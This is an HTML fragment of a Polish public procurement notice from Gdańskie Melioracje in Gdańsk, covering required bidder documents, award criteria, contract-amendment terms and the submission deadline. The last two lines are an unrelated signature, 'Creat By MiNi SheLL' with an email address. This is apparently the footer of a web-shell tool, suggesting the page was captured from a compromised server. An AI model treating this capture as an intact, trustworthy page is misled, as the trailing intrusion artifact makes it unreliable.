<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany Umowy będą dokonywane pod rygorem nieważności w formie pisemnej. 
2.	Zamawiający przewiduje możliwość dokonywania zmian postanowień Umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach i na poniższych warunkach:
1)	w przypadku, w którym nie ma możliwości dotrzymania terminu wykonania zamówienia, z przyczyn niezawinionych przez Wykonawcę - zmianie mogą ulec postanowienia Umowy w zakresie terminu wykonania zamówienia, poprzez jego wydłużenie odpowiednio do okresu występowania wskazanych przyczyn;
2)	w przypadku zmian przepisów prawa, które weszły w życie po zawarciu Umowy, a które powodują konieczność zmiany postanowień Umowy - w takim przypadku zmianie mogą ulec wyłącznie postanowienia Umowy, do których odnoszą się zmiany przepisów prawa w zakresie niezbędnym dla dostosowania Umowy do wprowadzonej zmiany prawa;
3)	jeżeli z przyczyn nie przewidzianych w chwili zawarcia Umowy niezbędne jest ograniczenie przez Zamawiającego zakresu zleconego przedmiotu zamówienia - w takim przypadku zmianie mogą ulec postanowienia Umowy odnoszące się do opisu przedmiotu zamówienia oraz obniżona zostanie wysokość wynagrodzenia o wartość elementów, których dotyczy to ograniczenie;
4)	w przypadku wystąpienia okoliczności powodujących konieczność zmiany sposobu wykonania przedmiotu zamówienia w związku z:
a)	niedostępnością na rynku materiałów lub urządzeń o parametrach wskazanych w dokumentacji projektowej spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b)	pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji Przedmiotu Umowy lub kosztów eksploatacji wykonanego Przedmiotu Umowy lub zapewniających lepszą trwałość bądź funkcjonalność elementów Przedmiotu Umowy lub poprawiających bezpieczeństwa pożarowego;
c)	przedstawienia przez Wykonawcę propozycji zastosowania w zakresie przedmiotu zamówienia zamiennych materiałów lub rozwiązań technicznych/technologicznych, które jeżeli zostaną uwzględnione przy realizacji robót zmniejszą Zamawiającemu koszty ich wykonania, konserwacji lub eksploatacji obiektów, bądź podniosą wartość robót bez zwiększania wynagrodzenia, bądź też funkcjonalność, efektywność lub bezpieczeństwo wykonywanych obiektów;
d)	koniecznością zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Przedmiotu Umowy,
- w takim przypadku zmianie mogą ulec postanowienia Umowy odnoszące się do opisu przedmiotu zamówienia oraz odpowiednio wysokość wynagrodzenia oraz postanowienia dotyczące terminów realizacji zamówienia o okres niezbędny dla realizacji rozwiązań zamiennych. Zmiana wysokości wynagrodzenia zostanie określona na podstawie różnicy wartości rozwiązań przewidzianych pierwotnie w dokumentacji projektowej i rozwiązań zastosowanych w ramach wprowadzonej zmiany przy zastosowaniu cen jednostkowych, wskazanych dla danego elementu w kosztorysie doręczonym przez Wykonawcę Zamawiającemu, a w przypadku, gdy cena jednostkowa dla danego elementu nie będzie wskazana w tym kosztorysie, ustalenie wartości elementów prac budowlano-montażowych, zarówno przewidzianych pierwotnie do wykonania zgodnie z Dokumentacją Projektową, jak i robót zamiennych, nastąpi na podstawie normatywów określonych w Katalogach Nakładów Rzeczowych (KNR), przy użyciu średnich, dla rejonu Pomorskiego stolica województwa cen stawek robocizny kosztorysowej, materiałów, urządzeń, i pracy sprzętu budowlanego, określonych w informacjach - SEKOCENBUD, wydawanych przez Ośrodek Wdrożeń Ekonomiczno-Organizacyjnych Budownictwa Promocja Sp. z o.o., oraz następujących  wskaźników cenotwórczych: roboty ziemne - Ko=40%, roboty pozostałe - Ko=70%, Kz= 8%, Z = 13,50%. W przypadku braku odpowiednich informacji w wydawnictwach - SEKOCENBUD, będą kolejno stosowane średnie ceny zawarte w informacjach - INTERCENBUD, ORGBUD przy zastosowaniu stawki robocizny i wskaźników cenotwórczych wskazanych powyżej.
3.	W przypadku przedstawienia przez Wykonawcę propozycji zastosowania rozwiązań zamiennych, o których mowa w ust. 2 pkt 4 lit. c) powyżej, Zamawiający będzie posiadał pełną swobodę, co do jej akceptacji lub odrzucenia. Wykonawca nie będzie uprawniony do jakiegokolwiek wstrzymywania lub opóźnienia prac w oczekiwaniu na akceptację propozycji zastosowania rozwiązania zamiennego, które może zostać wprowadzone do realizacji dopiero po zawarciu pisemnego aneksu przez Strony.
4.	W przypadku zaakceptowania przez Zamawiającego propozycji zastosowania rozwiązania zamiennego, o którym mowa w ust. 2 pkt 4 lit. c) powyżej, Wykonawca we własnym zakresie i na własny koszt przygotuje wszystkie niezbędne opracowania projektowe niezbędne dla wprowadzenia rozwiązania zamiennego oraz uzyska wymagane opinie, uzgodnienia i decyzje w tym zakresie. Wykonawca będzie ponosił pełną odpowiedzialność za prawidłowość, stabilność i trwałość robót wykonanych z uwzględnieniem rozwiązania zamiennego.
5.	W przypadku zaakceptowania rozwiązania zamiennego przez Zamawiającego, zmniejszającego koszt wykonania robót, wynagrodzenie ryczałtowe wskazane w ofercie Wykonawcy zostanie zmniejszone o kwotę stanowiącą 50% różnicy pomiędzy określonymi zgodnie z ust. 2 powyżej: wartością robót przewidzianych w Dokumentacji Projektowej, które zostają zastąpione rozwiązaniem zamiennym a wartością robót przewidzianych do wykonania w ramach rozwiązania zamiennego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gdmel.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gdańskie Melioracje Sp. z o.o. w Gdańsku
Adres: ul. Prof. Witolda Andruszkiewicza 5, 80 - 601 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 11:00, miejsce: W siedzibie Spółki Gdańskie Melioracje Sp. z o.o. w Gdańsku
ul. Prof. Witolda Andruszkiewicza 5, 80 - 601 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com